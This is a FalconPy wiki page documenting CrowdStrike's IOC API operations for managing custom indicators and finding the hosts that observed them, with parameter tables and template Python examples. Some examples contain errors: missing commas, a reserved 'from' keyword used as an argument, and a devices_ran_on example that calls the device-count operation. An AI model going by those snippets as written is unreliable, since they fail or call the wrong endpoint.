Ioc - CrowdStrike/falconpy GitHub Wiki
This service collection has code examples posted to the repository.
| Operation ID | Description | ||||
|---|---|---|---|---|---|
|
Get Indicators aggregates as specified via json in the request body. | ||||
|
Get Combined for Indicators. | ||||
|
Get Actions by ids. | ||||
|
Launch an indicators report creation job | ||||
|
Get Indicators by ids. | ||||
|
Create Indicators. | ||||
|
Delete Indicators by ids. | ||||
|
Update Indicators. | ||||
|
Query Actions. | ||||
|
Search for Indicators. | ||||
|
Query IOC Types. | ||||
|
Query Platforms. | ||||
|
Query Severities. | ||||
|
Number of hosts in your customer account that have observed a given custom IOC | ||||
|
Number of hosts in your customer account that have observed a given custom IOC | ||||
|
Find hosts that have observed a given custom IOC. For details about those hosts, use GET /devices/entities/devices/v1 | ||||
|
Find hosts that have observed a given custom IOC. For details about those hosts, use GET /devices/entities/devices/v1 | ||||
|
Search for processes associated with a custom IOC (Deprecated) | ||||
|
Search for processes associated with a custom IOC | ||||
|
For the provided ProcessID retrieve the process details | ||||
WARNING
client_idandclient_secretare keyword arguments that contain your CrowdStrike API credentials. Please note that all examples below do not hard code these values. (These values are ingested as strings.)CrowdStrike does not recommend hard coding API credentials or customer identifiers within source code.
Get Indicators aggregates as specified via json in the request body.
indicator_aggregate
| Method | Route |
|---|---|
 |
/iocs/aggregates/indicators/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| body |
 |
 |
body | list of dictionaries | Full body payload in JSON format. |
| date_ranges |
|
 |
body | list of dictionaries | Applies to date_range aggregations. Example: [ { "from": "2016-05-28T09:00:31Z", "to": "2016-05-30T09:00:31Z" }, { "from": "2016-06-01T09:00:31Z", "to": "2016-06-10T09:00:31Z" } ] |
| exclude |
|
|
body | string | Elements to exclude. |
| field |
|
|
body | string | The field on which to compute the aggregation. |
| filter |
|
|
body | string | FQL syntax formatted string to use to filter the results. |
| from |
|
|
body | integer | Starting position. |
| include |
|
|
body | string | Elements to include. |
| interval |
|
|
body | string | Time interval for date histogram aggregations. Valid values include:
|
| max_doc_count |
|
|
body | integer | Only return buckets if values are less than or equal to the value here. |
| min_doc_count |
|
|
body | integer | Only return buckets if values are greater than or equal to the value here. |
| missing |
|
|
body | string | Missing is the value to be used when the aggregation field is missing from the object. In other words, the missing parameter defines how documents that are missing a value should be treated. By default they will be ignored, but it is also possible to treat them as if they had a value. |
| name |
|
|
body | string | Name of the aggregate query, as chosen by the user. Used to identify the results returned to you. |
| q |
|
|
body | string | Full text search across all metadata fields. |
| ranges |
|
|
body | list of dictionaries | Applies to range aggregations. Ranges values will depend on field. For example, if max_severity is used, ranges might look like: [ { "From": 0, "To": 70 }, { "From": 70, "To": 100 } ] |
| size |
|
|
body | integer | The max number of term buckets to be returned. |
| sub_aggregates |
|
|
body | list of dictionaries | A nested aggregation, such as: [ { "name": "max_first_behavior", "type": "max", "field": "first_behavior" } ] There is a maximum of 3 nested aggregations per request. |
| sort |
|
|
body | string |
FQL syntax string to sort bucket results.
asc and desc using | format. Example: _count|desc
|
| time_zone |
|
|
body | string | Time zone for bucket results. |
| type |
|
|
body | string | Type of aggregation. Valid values include:
|
from falconpy.ioc import IOC
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
date_range = {
"from": "string",
"to": "string"
}
search_range = {
"From": integer,
"To": integer
}
response = falcon.indicator_aggregate(date_ranges=[date_range],
exclude="string",
field="string",
filter="string",
from=integer,
include="string",
interval="string",
max_doc_count=integer,
min_doc_count=integer,
missing="string",
name="string",
q="string",
ranges=[search_range],
size=integer,
sort="string",
time_zone="string",
type="string"
)
print(response)from falconpy import IOC
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
date_range = {
"from": "string",
"to": "string"
}
search_range = {
"From": integer,
"To": integer
}
response = falcon.indicator_aggregate_v1(date_ranges=[date_range],
exclude="string",
field="string",
filter="string",
from=integer,
include="string",
interval="string",
max_doc_count=integer,
min_doc_count=integer,
missing="string",
name="string",
q="string",
ranges=[search_range],
size=integer,
sort="string",
time_zone="string",
type="string"
)
print(response)from falconpy import APIHarnessV2
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
BODY = {
"date_ranges": [
{
"from": "string",
"to": "string"
}
],
"exclude": "string",
"field": "string",
"filter": "string",
"from": integer,
"include": "string",
"interval": "string",
"max_doc_count": integer,
"min_doc_count": integer,
"missing": "string",
"name": "string",
"q": "string",
"ranges": [
{
"From": integer,
"To": integer
}
],
"size": integer,
"sort": "string",
"sub_aggregates": [
null
]
"time_zone": "string",
"type": "string"
}
response = falcon.command("indicator_aggregate_v1",
filter="string",
from_parent=boolean,
body=BODY
)
print(response)Back to Table of Contents
Get Combined for Indicators.
indicator_combined
| Method | Route |
|---|---|
 |
/iocs/combined/indicator/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| after |
|
|
query | string | A pagination token used with the limit parameter to manage pagination of results. On your first request, don't provide an after token. On subsequent requests, provide the after token from the previous response to continue from that place in the results. To access more than 10k indicators, use the after parameter instead of offset. |
||||||||||||||||
| filter |
|
|
query | string |
FQL Syntax formatted filter that should be used to limit the results. Available filters:
|
||||||||||||||||
| from_parent |
|
|
query | boolean | The filter for returning either only indicators for the request customer or its MSSP parents. | ||||||||||||||||
| limit |
|
|
query | integer | Maximum number of results to return. | ||||||||||||||||
| offset |
|
|
query | integer | The offset to start retrieving records from. Offset and After params are mutually exclusive. If none provided then scrolling will be used by default. To access more than 10k iocs, use the after parameter instead of offset. |
||||||||||||||||
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. | ||||||||||||||||
| sort |
|
|
query | string | FQL Syntax formatted sort filter. |
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.indicator_combined(filter="string",
offset=integer,
limit=integer,
sort="string",
after="string",
from_parent=boolean
)
print(response)from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.indicator_combined_v1(filter="string",
offset=integer,
limit=integer,
sort="string",
after="string",
from_parent=boolean
)
print(response)from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.command("indicator_combined_v1",
filter="string",
offset=integer,
limit=integer,
sort="string",
after="string",
from_parent=boolean
)
print(response)Back to Table of Contents
Get Actions by ids.
action_get
| Method | Route |
|---|---|
|
/iocs/entities/actions/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| ids |
|
|
query | string or list of strings | The ids of the actions to retrieve. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
from falconpy.ioc import IOC
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
id_list = 'ID1,ID2,ID3' # Can also pass a list here: ['ID1', 'ID2', 'ID3']
response = falcon.action_get(ids=id_list)
print(response)from falconpy import IOC
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
id_list = 'ID1,ID2,ID3' # Can also pass a list here: ['ID1', 'ID2', 'ID3']
response = falcon.action_get_v1(ids=id_list)
print(response)from falconpy import APIHarnessV2
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
id_list = 'ID1,ID2,ID3' # Can also pass a list here: ['ID1', 'ID2', 'ID3']
response = falcon.command("action_get_v1", ids=id_list)
print(response)Back to Table of Contents
Launch an indicators report creation job
get_indicators_report
| Method | Route |
|---|---|
|
/iocs/entities/indicators-reports/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| body |
|
|
body | dictionary | Full body payload in JSON format. |
| filter |
|
|
body | string | FQL formatted string specifying the search filter. Overridden if search keyword is provided. |
| from_parent |
|
|
body | boolean | Return results for the parent only. |
| query |
|
|
body | string | FQL formatted string specifying the search query. Overridden if search keyword is provided. |
| report_format |
|
|
body | string | Format of the report. |
| search |
|
|
body | dictionary | Search parameters provided as a dictionary. Overrides values provided in the filter, query and sort keywords. |
| sort |
|
|
body | string | FQL formatted string specifying the sort. Overridden if search keyword is provided. |
from falconpy.ioc import IOC
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.get_indicators_report(filter="string",
query="string",
from_parent=boolean,
report_format="string",
sort="string"
)
print(response)from falconpy import IOC
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.GetIndicatorsReport(filter="string",
query="string",
from_parent=boolean,
report_format="string",
sort="string"
)
print(response)from falconpy import APIHarnessV2
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
BODY = {
"from_parent": boolean,
"report_format": "string",
"search": {
"filter": "string",
"query": "string",
"sort": "string"
}
}
response = falcon.command("GetIndicatorsReport", body=BODY)
print(response)Back to Table of Contents
Get Indicators by ids.
indicator_get
| Method | Route |
|---|---|
|
/iocs/entities/indicators/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| ids |
|
|
query | string or list of strings | The ids of the Indicators to retrieve. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
id_list = 'ID1,ID2,ID3' # Can also pass a list here: ['ID1', 'ID2', 'ID3']
response = falcon.indicator_get(ids=id_list)
print(response)from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
id_list = 'ID1,ID2,ID3' # Can also pass a list here: ['ID1', 'ID2', 'ID3']
response = falcon.indicator_get_v1(ids=id_list)
print(response)from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
id_list = 'ID1,ID2,ID3' # Can also pass a list here: ['ID1', 'ID2', 'ID3']
response = falcon.command("indicator_get_v1", ids=id_list)
print(response)Back to Table of Contents
Create Indicators.
indicator_create
| Method | Route |
|---|---|
|
/iocs/entities/indicators/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| action |
|
|
body | string | Default action for IOC. |
| applied_globally |
|
|
body | boolean | Flag indicating this IOC is applied globally. |
| body |
|
|
body | dictionary | Full body payload in JSON format. |
| comment |
|
|
body | string | IOC comment. |
| description |
|
|
body | string | IOC description. |
| expiration |
|
|
body | string | UTC formatted date string. |
| filename |
|
|
body | string | Filename to use for the metadata dictionary. |
| host_groups |
|
|
body | string or list of strings | List of host groups this IOC applies to. |
| ignore_warnings |
|
|
query | boolean | Flag to indicate that warnings are ignored. |
| indicators |
|
|
body | list of dictionaries | List of indicators to create. Overrides other keywords excluding body. Allows for the creation of multiple indicators at once. |
| metadata |
|
|
body | dictionary | Dictionary containing the filename for the IOC. Not required if the filename keyword is used. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
| platforms |
|
|
body | string or list of strings | Platforms this IOC impacts. |
| retrodetects |
|
|
query | boolean | Flag to indicate whether to submit retrodetects. |
| severity |
|
|
body | string | IOC severity. |
| source |
|
|
body | string | IOC source. |
| tags |
|
|
body | string or list of strings | IOC tags. |
| type |
|
|
body | string | IOC type. |
| value |
|
|
body | string | String representation of the IOC. |
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
host_group_list = 'HG1,HG2,HG3' # Can also pass a list here: ['HG1', 'HG2', 'HG3']
platform_list = 'OS1,OS2,OS3' # Can also pass a list here: ['OS1', 'OS2', 'OS3']
tag_list = 'TAG1,TAG2,TAG3' # Can also pass a list here: ['TAG1', 'TAG2', 'TAG3']
response = falcon.indicator_create(action="string",
applied_globally=boolean,
comment="string",
description="string",
expiration="string",
filename="string",
host_groups=host_group_list,
ignore_warnings=boolean,
platforms=platform_list,
retrodetects="string",
severity="string",
source="string",
tags=tag_list,
type="string"
value="string"
)
print(response)from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
host_group_list = 'HG1,HG2,HG3' # Can also pass a list here: ['HG1', 'HG2', 'HG3']
platform_list = 'OS1,OS2,OS3' # Can also pass a list here: ['OS1', 'OS2', 'OS3']
tag_list = 'TAG1,TAG2,TAG3' # Can also pass a list here: ['TAG1', 'TAG2', 'TAG3']
response = falcon.indicator_create_v1(action="string",
applied_globally=boolean,
comment="string",
description="string",
expiration="string",
filename="string",
host_groups=host_group_list,
ignore_warnings=boolean,
platforms=platform_list,
retrodetects="string",
severity="string",
source="string",
tags=tag_list,
type="string"
value="string"
)
print(response)from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
host_group_list = ['HG1', 'HG2', 'HG3']
platform_list = ['OS1', 'OS2', 'OS3']
tag_list = ['TAG1', 'TAG2', 'TAG3']
BODY = {
"comment": "string",
"indicators": [
{
"action": "string",
"applied_globally": true,
"description": "string",
"expiration": "2021-10-22T10:40:39.372Z",
"host_groups": host_group_list,
"metadata": {
"filename": "string"
},
"mobile_action": "string",
"platforms": platform_list,
"severity": "string",
"source": "string",
"tags": tag_list,
"type": "string",
"value": "string"
}
]
}
response = falcon.command("indicator_create_v1",
retrodetects=boolean,
ignore_warnings=boolean,
body=BODY
)
print(response)Back to Table of Contents
Delete Indicators by ids or a filter.
indicator_delete
| Method | Route |
|---|---|
 |
/iocs/entities/indicators/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| filter |
|
|
query | string |
FQL Syntax formatted filter that should be used to delete indicators in bulk. If both filter and ids are provided, then filter takes precedence and ids is ignored. |
| from_parent |
|
|
query | boolean | Limit action to IOCs originating from the MSSP parent. |
| ids |
|
|
query | string or list of strings | The ids of the Indicators to delete. If both filter and ids are provided, then filter takes precedence and ids is ignored. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
id_list = 'ID1,ID2,ID3' # Can also pass a list here: ['ID1', 'ID2', 'ID3']
response = falcon.indicator_delete(filter="string",
from_parent=boolean,
comment="string",
ids=id_list
)
print(response)from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
id_list = 'ID1,ID2,ID3' # Can also pass a list here: ['ID1', 'ID2', 'ID3']
response = falcon.indicator_delete_v1(filter="string",
from_parent=boolean,
comment="string",
ids=id_list
)
print(response)from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
id_list = 'ID1,ID2,ID3' # Can also pass a list here: ['ID1', 'ID2', 'ID3']
response = falcon.command("indicator_delete_v1",
filter="string",
from_parent=boolean,
comment="string",
ids=id_list
)
print(response)Back to Table of Contents
Update Indicators.
indicator_update
| Method | Route |
|---|---|
 |
/iocs/entities/indicators/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| action |
|
|
body | string | Default action for IOC. |
| applied_globally |
|
|
body | boolean | Flag indicating this IOC is applied globally. |
| body |
|
|
body | dictionary | Full body payload in JSON format. |
| bulk_update |
|
|
body | dictionary | Dictionary containing the indicator update in JSON format. Not necessary when using other keywords. |
| comment |
|
|
body | string | IOC comment. |
| description |
|
|
body | string | IOC description. |
| expiration |
|
|
body | string | UTC formatted date string. |
| filename |
|
|
body | string | Filename to use for the metadata dictionary. |
| from_parent |
|
|
body | boolean | Return results for the parent only. |
| host_groups |
|
|
body | string or list of strings | List of host groups this IOC applies to. |
| id |
|
|
body | string | The Indicator ID to be updated. At least one ID must be specified using this keyword, or as part of the indicators list using the indicators keyword. |
| ignore_warnings |
|
|
query | boolean | Flag to indicate that warnings are ignored. |
| indicators |
|
|
body | list of dictionaries | List of indicators to create. Overrides other keywords excluding body. Allows for the creation of multiple indicators at once. |
| metadata |
|
|
body | dictionary | Dictionary containing the filename for the IOC. Not required if the filename keyword is used. |
| mobile_action |
|
|
body | string | Mobile action to perform. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
| platforms |
|
|
body | string or list of strings | Platforms this IOC impacts. |
| retrodetects |
|
|
query | boolean | Flag to indicate whether to submit retrodetects. |
| severity |
|
|
body | string | IOC severity. |
| source |
|
|
body | string | IOC source. |
| tags |
|
|
body | string or list of strings | IOC tags. |
| type |
|
|
body | string | IOC type. |
| value |
|
|
body | string | String representation of the IOC. |
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
host_group_list = 'HG1,HG2,HG3' # Can also pass a list here: ['HG1', 'HG2', 'HG3']
platform_list = 'OS1,OS2,OS3' # Can also pass a list here: ['OS1', 'OS2', 'OS3']
tag_list = 'TAG1,TAG2,TAG3' # Can also pass a list here: ['TAG1', 'TAG2', 'TAG3']
response = falcon.indicator_update(action="string",
applied_globally=boolean,
comment="string",
description="string",
expiration="string",
filename="string",
from_parent=boolean,
host_groups=host_group_list,
ignore_warnings=boolean,
mobile_action="string",
platforms=platform_list,
retrodetects="string",
severity="string",
source="string",
tags=tag_list,
type="string"
value="string"
)
print(response)from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
host_group_list = 'HG1,HG2,HG3' # Can also pass a list here: ['HG1', 'HG2', 'HG3']
platform_list = 'OS1,OS2,OS3' # Can also pass a list here: ['OS1', 'OS2', 'OS3']
tag_list = 'TAG1,TAG2,TAG3' # Can also pass a list here: ['TAG1', 'TAG2', 'TAG3']
response = falcon.indicator_update_v1(action="string",
applied_globally=boolean,
comment="string",
description="string",
expiration="string",
filename="string",
from_parent=boolean,
host_groups=host_group_list,
ignore_warnings=boolean,
mobile_action="string",
platforms=platform_list,
retrodetects="string",
severity="string",
source="string",
tags=tag_list,
type="string"
value="string"
)
print(response)from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
host_group_list = ['HG1', 'HG2', 'HG3']
platform_list = ['OS1', 'OS2', 'OS3']
tag_list = ['TAG1', 'TAG2', 'TAG3']
BODY = {
"bulk_update": {
"action": "string",
"applied_globally": boolean,
"description": "string",
"expiration": "2021-10-22T11:03:16.123Z",
"filter": "string",
"from_parent": boolean,
"host_groups": host_group_list,
"mobile_action": "string",
"platforms": platform_list,
"severity": "string",
"source": "string",
"tags": tag_list
},
"comment": "string",
"indicators": [
{
"action": "string",
"applied_globally": boolean,
"description": "string",
"expiration": "2021-10-22T11:03:16.123Z",
"host_groups": host_group_list,
"id": "string",
"metadata": {
"filename": "string"
},
"mobile_action": "string",
"platforms": platform_list,
"severity": "string",
"source": "string",
"tags": tag_list
}
]
}
response = falcon.command("indicator_update_v1",
ignore_warnings=boolean,
retrodetects=boolean,
body=BODY
)
print(response)Back to Table of Contents
Query Actions.
action_query
| Method | Route |
|---|---|
|
/iocs/queries/actions/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| limit |
|
|
query | integer | Maximum number of results to return. |
| offset |
|
|
query | string | The offset to start retrieving records from. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
from falconpy.ioc import IOC
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.action_query(offset="string", limit=integer)
print(response)from falconpy import IOC
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.action_query_v1(offset="string", limit=integer)
print(response)from falconpy import APIHarnessV2
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.command("action_query_v1", offset="string", limit=integer)
print(response)Back to Table of Contents
Search for Indicators.
indicator_search
| Method | Route |
|---|---|
|
/iocs/queries/indicators/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| after |
|
|
query | string | A pagination token used with the limit parameter to manage pagination of results. On your first request, don't provide an after token. On subsequent requests, provide the after token from the previous response to continue from that place in the results. To access more than 10k indicators, use the after parameter instead of offset. |
||||||||||||||||
| filter |
|
|
query | string |
FQL Syntax formatted filter that should be used to limit the results. Available filters:
|
||||||||||||||||
| from_parent |
|
|
query | boolean | Return results for the parent only. | ||||||||||||||||
| limit |
|
|
query | integer | Maximum number of results to return. | ||||||||||||||||
| offset |
|
|
query | integer | The offset to start retrieving records from. Offset and After params are mutually exclusive. If none provided then scrolling will be used by default. To access more than 10k iocs, use the after parameter instead of offset. |
||||||||||||||||
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. | ||||||||||||||||
| sort |
|
|
query | string | FQL Syntax formatted sort filter. |
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.indicator_search(filter="string",
from_parent=boolean,
offset=integer,
limit=integer,
sort="string",
after="string"
)
print(response)from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.indicator_search_v1(filter="string",
from_parent=boolean,
offset=integer,
limit=integer,
sort="string",
after="string"
)
print(response)from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.command("indicator_search_v1",
filter="string",
from_parent=boolean,
offset=integer,
limit=integer,
sort="string",
after="string"
)
print(response)Back to Table of Contents
Query IOC Types.
ioc_type_query
| Method | Route |
|---|---|
|
/iocs/queries/ioc-types/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| limit |
|
|
query | integer | Maximum number of results to return. |
| offset |
|
|
query | string | The offset to start retrieving records from. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
from falconpy.ioc import IOC
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.ioc_type_query(offset="string", limit=integer)
print(response)from falconpy import IOC
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.ioc_type_query_v1(offset="string", limit=integer)
print(response)from falconpy import APIHarnessV2
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.command("ioc_type_query_v1", offset="string", limit=integer)
print(response)Back to Table of Contents
Query Platforms.
platform_query
| Method | Route |
|---|---|
|
/iocs/queries/platforms/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| limit |
|
|
query | integer | Maximum number of results to return. |
| offset |
|
|
query | string | The offset to start retrieving records from. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
from falconpy.ioc import IOC
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.platform_query(offset="string", limit=integer)
print(response)from falconpy import IOC
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.platform_query_v1(offset="string", limit=integer)
print(response)from falconpy import APIHarnessV2
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.command("platform_query_v1", offset="string", limit=integer)
print(response)Back to Table of Contents
Query Severities.
severity_query
| Method | Route |
|---|---|
|
/iocs/queries/severities/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| limit |
|
|
query | integer | Maximum number of results to return. |
| offset |
|
|
query | string | The offset to start retrieving records from. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
from falconpy.ioc import IOC
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.severity_query(offset="string", limit=integer)
print(response)from falconpy import IOC
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.severity_query_v1(offset="string", limit=integer)
print(response)from falconpy import APIHarnessV2
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.command("severity_query_v1", offset="string", limit=integer)
print(response)Back to Table of Contents
Number of hosts in your customer account that have observed a given custom IOC
This operation has been superseded by the indicator_get_device_count_v1 operation.
devices_count_legacy
| Method | Route |
|---|---|
|
/indicators/aggregates/devices-count/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| type |
|
|
query | string | The type of the indicator. Valid types include:
|
| value |
|
|
query | string | The string representation of the indicator. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.devices_count_legacy(type="string", value="string")
print(response)from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.DevicesCount(type="string", value="string")
print(response)from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.command("DevicesCount", type="string", value="string")
print(response)Back to Table of Contents
Number of hosts in your customer account that have observed a given custom IOC
devices_count (or indicator_get_device_count_v1)
| Method | Route |
|---|---|
|
/iocs/aggregates/indicators/device-count/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| type |
|
|
query | string | The type of the indicator. Valid types include:
|
| value |
|
|
query | string | The string representation of the indicator. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.devices_count(type="string", value="string")
print(response)from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.indicator_get_device_count_v1(type="string", value="string")
print(response)from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.command("indicator_get_device_count_v1", type="string", value="string")
print(response)Back to Table of Contents
Find hosts that have observed a given custom IOC.
This operation has been superseded by the indicator_get_devices_ran_on_v1 operation.
devices_ran_on_legacy
| Method | Route |
|---|---|
|
/indicators/queries/devices/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| type |
|
|
query | string | The type of the indicator. Valid types include:
|
| value |
|
|
query | string | The string representation of the indicator. |
| limit |
|
|
query | integer | Maximum number of results to return. |
| offset |
|
|
query | integer | Starting offset to begin returning results. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.devices_ran_on_legacy(type="string",
value="string",
limit="string",
offset="string"
)
print(response)from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.DevicesRanOn(type="string",
value="string",
limit="string",
offset="string"
)
print(response)from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.command("DevicesRanOn",
type="string",
value="string",
limit="string",
offset="string"
)
print(response)Back to Table of Contents
Find hosts that have observed a given custom IOC.
devices_ran_on (or indicator_get_devices_ran_on_v1)
| Method | Route |
|---|---|
|
/iocs/queries/indicators/devices/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| type |
|
|
query | string | The type of the indicator. Valid types include:
|
| value |
|
|
query | string | The string representation of the indicator. |
| limit |
|
|
query | integer | Maximum number of results to return. |
| offset |
|
|
query | integer | Starting offset to begin returning results. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.devices_ran_on(type="string",
value="string",
limit="string",
offset="string"
)
print(response)from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.indicator_get_device_count_v1(type="string",
value="string",
limit="string",
offset="string"
)
print(response)from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.command("indicator_get_device_count_v1",
type="string",
value="string",
limit="string",
offset="string"
)
